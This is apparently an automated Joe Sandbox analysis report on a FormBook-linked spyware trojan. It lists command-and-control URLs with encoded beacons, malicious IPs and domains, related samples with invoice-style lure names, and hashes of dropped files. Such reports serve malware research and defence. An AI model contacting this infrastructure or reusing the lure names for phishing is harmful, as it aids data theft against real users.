            http://www.cacingnaga36.click/ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: safe | unknown
            http://www.smokesandhoney.com/ld3u/ | true | Avira URL Cloud: safe | unknown
            http://www.5a8yly.cfd/kfsd/ | true | Avira URL Cloud: safe | unknown
            http://www.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: safe | unknown
            http://www.bnmlk.org/r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== | true | Avira URL Cloud: safe | unknown
            http://www.marinamaquiagens.online/n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: safe | unknown
            http://www.yi992.com/iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: safe | unknown
            http://www.wildenmann.shop/ccpi/ | true | Avira URL Cloud: safe | unknown
            http://www.4odagiyn.click/f1qc/ | true | Avira URL Cloud: safe | unknown
            http://www.bnmlk.org/r6tm/ | true | Avira URL Cloud: safe | unknown
            http://www.marinamaquiagens.online/n4sv/ | true | Avira URL Cloud: safe | unknown
            http://www.formytinyhome.com/lztc/ | true | Avira URL Cloud: safe | unknown
            http://www.rigintech.info/ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ | true | Avira URL Cloud: malware | unknown
            http://www.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA== | true | Avira URL Cloud: safe | unknown
            http://www.yi992.com/iuti/ | true | Avira URL Cloud: safe | unknown
            http://www.rigintech.info/ig9u/ | true | Avira URL Cloud: malware | unknown
            http://www.wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA== | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bnmlk.org/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmQ5YTM2NDExYzB | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.namesilo.com/whois | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://d38psrni17bvxu.cloudfront.net/themes/registrar/images/namesilo.svg | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.namesilo.com | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pcnatrk.net/track. | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww7.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuq | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000004B66000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004FB6000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9 | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005B1A000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005F6A000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqb | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005CAC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000060FC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.smokesandhoney.com/ld3u/?V6h=7cSyNGFy/S5quoM6udyikngV4L2ptvlq1/kf9BPZtTlwCENfjvle2IZfxcv | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000057F6000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005C46000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000049D4000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000051AE000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000006162000.00000004.80000000.00040000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005E3E000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000065B2000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.000000000628E000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004E24000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.00000000055FE000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003BAE4000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.namesilo.com/domain/search-domains | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://c.parkingcrew.net/scripts/sale_form.js | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005664000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005AB4000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4490874139.0000000007110000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.4odagiyn.click | sXmdPDASzrmzi.exe, 00000003.00000002.4491976479.0000000006A6F000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000054D2000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005922000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msiexec.exe, 00000004.00000002.4490958561.00000000073BE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1 | sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.0000000005988000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000005DD8000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
72.52.178.23 | www.4odagiyn.click | United States | | 32244 | LIQUIDWEBUS | true
162.0.213.94 | www.rigintech.info | Canada | | 35893 | ACPCA | true
15.197.240.20 | www.marinamaquiagens.online | United States | | 7430 | TANDEMUS | true
199.59.243.226 | 77980.bodis.com | United States | | 395082 | BODIS-NJUS | true
13.248.151.237 | 869710.parkingcrew.net | United States | | 16509 | AMAZON-02US | true
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | | 2686 | ATGS-MMD-ASUS | true
91.203.110.247 | www.wildenmann.shop | Germany | | 45012 | CLOUDPITDE | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1504851
Start date and time: 2024-09-05 14:23:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0XLuA614VK.exe (renamed because original name is a hash value)
Original Sample Name: 4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@17/7
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 51
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 0XLuA614VK.exe
Time | Type | Description
08:24:52 | API Interceptor | 11430123x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
72.52.178.23 | firmware.mipsel.elf | Get hash | malicious | Unknown | Browse | 72.52.178.23/
72.52.178.23 | firmware.x86_64.elf | Get hash | malicious | Unknown | Browse | 72.52.178.23/
72.52.178.23 | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | Get hash | malicious | FormBook, LummaC Stealer | Browse | wxgzshna.biz/tjqadrxf
72.52.178.23 | Payment Advice_pdf.exe | Get hash | malicious | FormBook | Browse | www.4odagiyn.click/gxdy/?wr0Pj=KV5Jrq3uQAaNM2aLdfcvsgjVK9kADTCwl2ot6XJe6eXLh/GoAhGOOChIKT8ahsBMcaoVrunStVNYmOsjn5DhXB3XfkbxjY3JL8iub3zErALsqAgcv+n8a/I=&1d=cfLL
72.52.178.23 | QLLafoDdqv.exe | Get hash | malicious | FormBook | Browse | www.shenzhoucui.com/fo8o/
72.52.178.23 | http://www.multipool.us | Get hash | malicious | Unknown | Browse | www.multipool.us/
72.52.178.23 | http://rum.browser-intake-foxbusiness.com:443 | Get hash | malicious | Unknown | Browse | rum.browser-intake-foxbusiness.com:443/
72.52.178.23 | http://browser-intake-foxbusiness.com | Get hash | malicious | Unknown | Browse | browser-intake-foxbusiness.com/
72.52.178.23 | aMVimXl3J6.exe | Get hash | malicious | FormBook | Browse | www.healthinsuranceudeserve.com/kh11/?Yr=DbvxavN0kTq4E&ntS0L=1H3nvWnZjx+kOq+b3inDsNTp35kb7Yw3MUDOPsdY5ZonUKiwsqJJyt4MaNJ5mtic8z8SCIdgGw==
72.52.178.23 | LF20240228.exe | Get hash | malicious | FormBook | Browse | www.fast-homeinsurance.com/hy07/?ZhlD=mYc7DAfFIXsnR5XI4bXVULdHqAETEpg2uGSuZcmPRmw897JoUH0zysUuzYAfVy/JlsH7&b6A=tZIxBtJPg0V4O
162.0.213.94 | RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | Get hash | malicious | FormBook | Browse | www.zyfro.info/hnng/
162.0.213.94 | PO#86637.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
162.0.213.94 | PI 30_08_2024.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
162.0.213.94 | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.kryto.top/09dt/
162.0.213.94 | factura-630.900.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
162.0.213.94 | PAGO $630.900.exe | Get hash | malicious | FormBook | Browse | www.syvra.xyz/h2bb/
162.0.213.94 | QSFD.exe | Get hash | malicious | FormBook | Browse | www.princestun.xyz/n5mw/?68YL4=NtfoMqxWvboNlKrSljDMsJlBryyMW+EpK2NVcn2/0I1oKqymTxIT6zJKN0ZuwJhX9ergv3TNlgjObhSZFizOZXKOR4lLjJiElan/als/iv7JzBcnvYJBrer1blIjywcuzitohjQ=&W8T0s=9n9Poz6
162.0.213.94 | !2#4.exe | Get hash | malicious | FormBook | Browse | www.princestun.xyz/n5mw/?IRHpZ0L0=NtfoMqxWvboNlKrVgjDi+u5ev237R5YpK2NVcn2/0I1oKqymTxIT6zJKN0ZuwJhX9ergv3TNlgjObhSZFizOYVaTR9ZKjKfRg67oZl8/i6Dn1xcrvY8lwbY=&NXK=k644bhNH
162.0.213.94 | 64MXEd79F1.exe | Get hash | malicious | FormBook | Browse | www.princestun.xyz/n5mw/?pZXDmpb8=NtfoMqxWvboNlKrSljDMsJlBryyMW+EpK2NVcn2/0I1oKqymTxIT6zJKN0ZuwJhX9ergv3TNlgjObhSZFizOZXKOR4lLjJiElan/als/iv7JzBcnvYJBrer1blIjywcuzitohjQ=&fv=tdYXXJI8Drl4
162.0.213.94 | Quote - V-24-TOS-082.exe | Get hash | malicious | FormBook | Browse | www.nuelahome.info/34ta/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
77980.bodis.com | firmware.armv7l.elf | Get hash | malicious | Unknown | Browse | 199.59.243.226
77980.bodis.com | firmware.i586.elf | Get hash | malicious | Unknown | Browse | 199.59.243.226
77980.bodis.com | 8mwXY7Lh2phgnOz.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
77980.bodis.com | Ii4XtPGi5n3AWmt.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
77980.bodis.com | QSFD.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
77980.bodis.com | PO TIYEY078K.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 199.59.243.226
77980.bodis.com | !2#4.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
77980.bodis.com | rPHOTO09AUG2024.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
77980.bodis.com | PO AFHOR9301604.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
77980.bodis.com | Quote - V-24-TOS-082.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
www.rigintech.info | AED 47,000.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
www.rigintech.info | PgbcaAGOnA.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
869710.parkingcrew.net | https://cw-trk.checkyournewprotal.com/ga/click/2-80946765-4164-20354-40097-22548-16858ffb5f-f550aa5f1d | Get hash | malicious | Unknown | Browse | 13.248.151.237
869710.parkingcrew.net | v2XwLpMqG5.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | Ota2Wn3EP3.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | BORI4x10091021.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | ledger.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | Swift Copy.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | Y0GEeY1WOWNMYni.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | 7da1ac7cd7a61715807d49e8c79b054ba302b3988ba19.exe | Get hash | malicious | Raccoon RedLine SmokeLoader Tofsee Xmrig | Browse | 99.81.40.78
869710.parkingcrew.net | Pending DHL Shipment Notification REF 9-02-21.exe | Get hash | malicious | FormBook | Browse | 99.81.40.78
869710.parkingcrew.net | Payment Copy.doc | Get hash | malicious | FormBook | Browse | 99.81.40.78
www.wildenmann.shop | PO TIYEY078K.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 91.203.110.247
www.wildenmann.shop | PO AFHOR9301604.exe | Get hash | malicious | FormBook | Browse | 91.203.110.247
www.wildenmann.shop | Quote - V-24-TOS-082.exe | Get hash | malicious | FormBook | Browse | 91.203.110.247
www.wildenmann.shop | AED 47,000.exe | Get hash | malicious | FormBook | Browse | 91.203.110.247
www.wildenmann.shop | PO JAN 2024.exe | Get hash | malicious | FormBook | Browse | 91.203.110.247
www.wildenmann.shop | All_requests_and_company_profile.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 91.203.110.247
www.wildenmann.shop | RFQ_DATA_AND_PROFILE.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 91.203.110.247
www.wildenmann.shop | Quote_Requests_data_and_profile.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 91.203.110.247
www.wildenmann.shop | New_requests_and_profile.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 91.203.110.247
www.wildenmann.shop | Request_for_Quotation_All_data.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 91.203.110.247
www.4odagiyn.click | Payment Advice_pdf.exe | Get hash | malicious | FormBook | Browse | 72.52.178.23
www.4odagiyn.click | AED 47,000.exe | Get hash | malicious | FormBook | Browse | 43.154.67.170
www.4odagiyn.click | PAY-0129.exe | Get hash | malicious | FormBook | Browse | 43.154.67.170
www.4odagiyn.click | CamScanner_12-12-2023_01.03.exe | Get hash | malicious | FormBook, zgRAT | Browse | 43.154.67.170
www.4odagiyn.click | QfCRNUUnbY.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 43.154.67.170
www.4odagiyn.click | PO_138659.exe | Get hash | malicious | FormBook | Browse | 43.154.67.170
www.4odagiyn.click | 5.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 43.154.67.170
www.4odagiyn.click | DHL_SOA_1004404989.exe | Get hash | malicious | FormBook | Browse | 43.154.67.170
www.4odagiyn.click | BL_NO_WWSNSA0212JAE.exe | Get hash | malicious | FormBook | Browse | 43.154.67.170
www.4odagiyn.click | Purchase_order.exe | Get hash | malicious | FormBook, NSISDropper | Browse | 43.154.67.170
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TANDEMUS | firmware.armv4l.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.armv5l.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.armv7l.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.i586.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.i686.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.mipsel.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.sh4.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | firmware.x86_64.elf | malicious | Unknown | 15.197.148.33
TANDEMUS | MV ALIADO - S-REQ-19-00064 List items.exe | malicious | FormBook | 15.197.204.56
TANDEMUS | SyncTextReader.exe | malicious | FormBook | 15.197.192.55
LIQUIDWEBUS | firmware.armv4l.elf | malicious | Unknown | 67.227.154.36
LIQUIDWEBUS | firmware.armv5l.elf | malicious | Unknown | 67.227.154.36
LIQUIDWEBUS | firmware.armv7l.elf | malicious | Unknown | 192.190.220.186
LIQUIDWEBUS | firmware.i586.elf | malicious | Unknown | 192.190.220.186
LIQUIDWEBUS | firmware.i686.elf | malicious | Unknown | 192.190.220.186
LIQUIDWEBUS | firmware.mipsel.elf | malicious | Unknown | 72.52.178.23
LIQUIDWEBUS | firmware.x86_64.elf | malicious | Unknown | 72.52.178.23
LIQUIDWEBUS | https://tiangco.com/?tgc=dGVzdEB0aWFuZ2NvLmNvbS3igJxUZXN0IFVzZXI= | malicious | HTMLPhisher | 50.28.1.103
LIQUIDWEBUS | http://marketing.blizzfull.com/r/?to=https://outerbanksgear.com/act/ahges/brandy.wood@wildlife.ca.gov | malicious | Unknown | 50.28.99.49
LIQUIDWEBUS | http://readabilityscore.com | malicious | Unknown | 67.225.218.25
BODIS-NJUS | Solicitud de Cotización – Catálogo de Muestras2024.vbs | malicious | FormBook, GuLoader | 199.59.243.226
BODIS-NJUS | firmware.armv4l.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | firmware.armv7l.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | firmware.i586.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | firmware.i686.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | firmware.mipsel.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | firmware.x86_64.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | MV ALIADO - S-REQ-19-00064 List items.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | SecuriteInfo.com.Script.SNH-gen.5224.29912.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | http://readabilityscore.com | malicious | Unknown | 199.59.243.205
ACPCA | http://jan47nfhc.3utilities.com/#SAK0BE-SUREJACKZ3J6ZWdvcnouZ2FsYXJhQGNjYy5ldQ== | malicious | Unknown | 162.0.209.83
ACPCA | RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | 162.0.213.94
ACPCA | 220204-TF1--00.exe | malicious | FormBook | 162.55.254.209
ACPCA | 20-EM-00- PI-INQ-3001.exe | malicious | FormBook | 162.55.254.209
ACPCA | Rockwool group_SKM_C590368369060_417161.pdf.pdf | malicious | HTMLPhisher | 162.0.217.108
ACPCA | PO#86637.exe | malicious | FormBook | 162.0.213.94
ACPCA | https://sweet-solomon.67-23-166-125.plesk.page/dave_jackson_tremblay/fouleebel--_--legardaise/victorien--_--.andre/tonysandrine.--_--henedieu/david.hernandez--_--aristizabal | malicious | Unknown | 162.55.246.61
ACPCA | RFQ STR-160-01.exe | malicious | FormBook | 162.55.254.209
ACPCA | firmware.arm-linux-gnueabihf.elf | malicious | Unknown | 162.48.22.207
ACPCA | PI 30_08_2024.exe | malicious | FormBook | 162.0.213.94
                                                    No context
                                                    No context
                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.121297215059106
                                                    Encrypted:false
                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):86022
                                                    Entropy (8bit):4.178866841846399
                                                    Encrypted:false
                                                    SSDEEP:1536:IZdNJ184vEfdrTfoWX5eYZe6fjIzpEeAJlA:YdN0IWE0VIfAJG
                                                    MD5:351A84B23D9E278A7241FD1086E178C8
                                                    SHA1:10CC60CD6E89B6D0C2B375BFC4C7939B49B05650
                                                    SHA-256:F0B085F40976D8920799C7338A25DEA2B76719F61D0F015F805BC2EB079BC287
                                                    SHA-512:BBAE7474ADC078210393EE59489FAF74364498C398CD1BB221F9E89AED733E8C107BA2099C7063F6373AE0EA1217C5A4083897FF7D0CBCF471077DE94168CABB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: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
                                                    Process:C:\Users\user\Desktop\0XLuA614VK.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):272384
                                                    Entropy (8bit):7.9934090783519185
                                                    Encrypted:true
                                                    SSDEEP:6144:GliSizvPXmMpg5ehcQvgP0FcKgF4m93rgD6AlyxfR60Ix1/:GllcnXmMRbgnWs3cMgx1/
                                                    MD5:A1FB5C2C967AA8558C7D23183F7AFD9C
                                                    SHA1:46A77E92EADE977BBF0EC71AFB2BC2A413E2AF3B
                                                    SHA-256:ACC62B73F9AFC1FFA76DFD1823BB3B6E2257EF8058CF8E7DAF733FD584ED9EF2
                                                    SHA-512:04E2A1888D8751774ECAF2D0A55BC92ACAC79E0212771355D8DA9C7D6644A72A574D1686CC065900D04C08EDC22B29560FCFAC7D2F9B5698544B65B3424B03EC
                                                    Malicious:false
                                                    Reputation:low
